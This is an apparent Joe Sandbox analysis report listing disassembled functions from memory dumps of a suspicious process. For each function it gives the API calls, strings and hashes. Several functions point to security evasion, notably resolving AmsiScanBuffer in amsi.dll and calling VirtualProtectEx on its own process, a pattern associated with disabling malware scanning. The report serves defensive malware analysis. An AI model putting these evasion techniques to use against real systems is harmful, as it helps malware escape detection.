Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: c87db0438632d337b303537608cb96311ab4096f315008d5b1aad79e1934dc2a
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: F4F08122314A84D3E761CB24EC88359A361F75AB89F8440218A49425D8DE7CC68CC704

Function 000002527DF11AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002527DF11AF4
StrCmpNIW.SHLWAPI ref: 000002527DF11B0E
lstrlenW.KERNEL32 ref: 000002527DF11B1D
StrCpyW.SHLWAPI ref: 000002527DF11B32

Strings

\\?\, xrefs: 000002527DF11B02

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: f0aaf5f9d33c9d8fff0f1652342d7f9264a67386072e24dca2f24acb3a4ccc09
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 79F0A422314E85D2EB20CB20FC8835EE361F749B99F844021CA5D426D4DF7CC68CC745

Function 000002527DEEB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002527DEEB929
GetProcAddress.KERNEL32 ref: 000002527DEEB93F
FreeLibrary.KERNEL32 ref: 000002527DEEB95B

Strings

CorExitProcess, xrefs: 000002527DEEB938
mscoree.dll, xrefs: 000002527DEEB920

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 4497025c4f0a6c9ad431fddf92db267582bdc678b5450b6dfde4822052412f61
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 3EF09061201E01C3FA52CB24EC8C369A730EB8F762F940319DAAA451E8CF3DC54CC718

Function 000002527DEE3708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002527DEE275A), ref: 000002527DEE372A
StrCpyW.SHLWAPI ref: 000002527DEE373A
StrCatW.SHLWAPI ref: 000002527DEE3746
PathCombineW.SHLWAPI(?,?,00000000,000002527DEE275A), ref: 000002527DEE3754

Strings

\\.\pipe\, xrefs: 000002527DEE3720

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 19b08da54325c72230b2d9a3aa8fd6b7180f303ad0e659c685d072801e4794a2
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 62F05E64704F90C3EA86CB27FD1811AE661EB5EFC2F448530EE4A07BD8CE38C5498708

Function 000002527DF1B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002527DF1B929
GetProcAddress.KERNEL32 ref: 000002527DF1B93F
FreeLibrary.KERNEL32 ref: 000002527DF1B95B

Strings

CorExitProcess, xrefs: 000002527DF1B938
mscoree.dll, xrefs: 000002527DF1B920

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: e0523ff5bc4941b66f970e5064559f72f0c9af6bc8d7455e09f607f55843a1d3
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: 03F09061205E01C1EB10CB24EC8936EA760EB8F766F980219DA7A492E4CF3DC44DC78A

Function 000002527DF13708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002527DF1275A), ref: 000002527DF1372A
StrCpyW.SHLWAPI ref: 000002527DF1373A
StrCatW.SHLWAPI ref: 000002527DF13746
PathCombineW.SHLWAPI(?,?,00000000,000002527DF1275A), ref: 000002527DF13754

Strings

\\.\pipe\, xrefs: 000002527DF13720

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 0c4e79e96454463c58509058a755d5a15a63a79a330d9fae1a055ea0b5b5401a
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: B2F05464304F80C1EA04DB13BD1822AD251F74DFC2F449530ED2647BD8CE38D9898745

Function 000002527DF11E3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000002527DF11E47
GetProcAddress.KERNEL32 ref: 000002527DF11E57
Sleep.KERNEL32 ref: 000002527DF11E67

Strings

amsi.dll, xrefs: 000002527DF11E40
AmsiScanBuffer, xrefs: 000002527DF11E50

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: AmsiScanBuffer$amsi.dll
API String ID: 188063004-3248079830
Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction ID: 6483bcadd7cf88fd87a48a9eba789e3e948919b7902e669d6caea1f9c789e4b2
Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
Instruction Fuzzy Hash: DAD01720A11E01D2EA08EF40EC5C32AA221FBAEB13FC40014C52A063E4DE3CA44CC3DA

Function 000002527DEE5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DEE5896

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: a3db27a47fb6dc8ecf69f04cbaba1fd769aea916a185dfaef03210489fe46a24
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 2102B632219B84C6E7A1CB65F89435AF7A0F389795F104015EA8E87BE8DF7DC498CB05

Function 000002527DF15810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DF15896

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 40c7e14608a2328e88efd3acb7c623058729cd745a1b7728dab72c13ffd544eb
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 0902B932219B84C6EB60CB59E89435AF7B0F3C9795F104016EA9E87BE8DB7DC458CB05

Function 000002527DEE2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002527DEE2CAD
TlsGetValue.KERNEL32 ref: 000002527DEE2CBC
TlsGetValue.KERNEL32 ref: 000002527DEE2CCB
TlsSetValue.KERNEL32 ref: 000002527DEE2E0F
TlsSetValue.KERNEL32 ref: 000002527DEE2E1E
TlsSetValue.KERNEL32 ref: 000002527DEE2E2D

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: dcc0f65b68ce192acf713f7f58e26ba1a7eac96b78e0ad3617807e20a2eda88c
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 94519F35204E11C7E366CF26EC48A5AF3A4F79EB86F508119DE5A43BD4DB38C949CB08

Function 000002527DF12C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002527DF12CAD
TlsGetValue.KERNEL32 ref: 000002527DF12CBC
TlsGetValue.KERNEL32 ref: 000002527DF12CCB
TlsSetValue.KERNEL32 ref: 000002527DF12E0F
TlsSetValue.KERNEL32 ref: 000002527DF12E1E
TlsSetValue.KERNEL32 ref: 000002527DF12E2D

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 36a1359e6faada86d549f7ebef3994888d40cf4af4caad94dd4f07c23df321df
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: F851B135204E01CBE764CB5AEC49A5AF3A0F78EB92F504119DE6A437D4DF3AC809CB49

Function 000002527DEE2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002527DEE2AE1
TlsGetValue.KERNEL32 ref: 000002527DEE2AF0
TlsGetValue.KERNEL32 ref: 000002527DEE2AFF
TlsSetValue.KERNEL32 ref: 000002527DEE2C3B
TlsSetValue.KERNEL32 ref: 000002527DEE2C4A
TlsSetValue.KERNEL32 ref: 000002527DEE2C59

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 7c1200e4def28276fe0bf26720e4af28c0dd19343a35ef5e2783541f964835bd
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 9C518C36214E41CBE765CF26EC48A6AF3A0F39EB86F504119DE5A437D4DB38D909CB08

Function 000002527DF12AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002527DF12AE1
TlsGetValue.KERNEL32 ref: 000002527DF12AF0
TlsGetValue.KERNEL32 ref: 000002527DF12AFF
TlsSetValue.KERNEL32 ref: 000002527DF12C3B
TlsSetValue.KERNEL32 ref: 000002527DF12C4A
TlsSetValue.KERNEL32 ref: 000002527DF12C59

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 0eecac4d0ac25ba7febab66d9ab9f8bc51e091879ec3ea68a7ed319700d884f2
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 30518E35214E41CBE724CF5AAC4966AF3A0F38EB96F404119DE6A437D4DB39D909CB09

Function 000002527DEE5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DEE5E66

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 87640be07fcec805adc248af6962543f391f4352796f1d53016038fc01c2d628
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 2F61B476129A40C7F761DB25E85831AF7A0F38E745F50051AEA8D83BE8DB7CC548CB09

Function 000002527DF15E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002527DF15E66

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 729c1eafbd46d8543ec3b5f06b0f6286f94b52163d13966cf3ad8fa1cc7d85f3
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 3C619536529A84C7E760CB19E85831AF7A0F38E745F100116FA9D87BE8DB7DC548CB4A

Function 000002527DEE3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F68

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 4947df8182b46b694410fe3e03f3689f6f6b928a58a10d151d071fa025404766
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: C5112E36615B40D3FB65CB21E80865AE7B0FB4AB82F044026DA4D037E8EF7DC958C788

Function 000002527DF13EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DF13A5B), ref: 000002527DF13EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DF13A5B), ref: 000002527DF13F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DF13A5B), ref: 000002527DF13F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DF13A5B), ref: 000002527DF13F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DF13A5B), ref: 000002527DF13F68

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 19f3e7c7ae139208335f580184dc3413b29ef7014b85eca1965fbc875f95d344
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 9E111626605B41D3EB24DB21E84831AE7B0F74AB95F080126DE5D037D8EB7DD558C789

Function 000002527DEE8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002527DEE8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002527DEE8D62
RtlUnwindEx.NTDLL ref: 000002527DEE8DBC

Strings

csm, xrefs: 000002527DEE8D49

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 5c2f07d6a800440fe5abe51c400133ace9c51935190d756f3e1c2e45ca80e3b5
